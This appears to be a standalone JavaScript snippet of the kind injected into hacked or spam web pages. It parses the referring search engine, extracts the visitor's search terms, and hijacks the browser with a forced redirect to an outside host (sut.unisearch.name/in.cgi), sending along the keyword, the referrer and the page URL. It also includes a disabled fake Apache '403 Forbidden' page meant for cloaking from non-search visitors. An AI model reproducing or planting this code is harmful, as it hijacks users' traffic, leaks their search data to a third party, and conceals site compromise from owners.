r=document.referrer;u=document.URL;t="";se="unknown";
k=(document.forms['form_name'].elements['whoami'].value); 
function a(c,d,e){if(r.indexOf(c)!=-1){t=d;se=e;}}
a("google.","q","google");
a("msn.","q","msn");
a("yahoo.","p","yahoo");
a("altavista.","q","altavista");
a("aol.","query","aol");
a("ask.","q","ask");
a("eureka.com.","q","eureka.com");
a("lycos.com.","query","lycos");
a("hotbot.com.","MT","hotbot");
a("infoseek.com.","qt","infoseek.com");
a("webcrawler.","searchText","webcrawler");
a("excite.","search","excite");
a("netscape.com.","search","netscape");
a("mamma.com.","query","mamma");
a("alltheweb.com.","query","alltheweb.com");
a("northernlight.com.","qr","northernlight.com");
a("rambler.ru.","words","rambler.ru");
a("aport.ru.","r","aport.ru");
a("yandex.ru.","text","yandex.ru");
a("pingwin.ru.","searchword","pingwin.ru");
a("www.ru.","Str_Find","www.ru");
a("punto.ru.","text","punto.ru"); 
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))k=r.substring(q+2+t.length).split("&")[0];
 if(top.document.referrer.indexOf("search") == -1 &&
    top.document.referrer.indexOf("?")      == -1 && 0)
 {
  window.document.title='403 Forbidden';
  window.document.body.style.backgroundColor='white';
  window.document.body.style.color='black';
  document.writeln("<H1>Forbidden</H1>");
  document.writeln("You don't have permission to access "+window.location.pathname);
  document.writeln("on this server.<P>");
  document.writeln("<HR>");
  document.writeln("<ADDRESS>Apache/1.3.29 Server at "+window.location.hostname+" Port 80</ADDRESS>");
  document.writeln("<div style='display:none'>");
 }
 else
 {
  top.location.href='http://sut.unisearch.name/in.cgi?3&parameter='+k+"&seoref="+encodeURIComponent(document.referrer)+"&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=empty";
 }
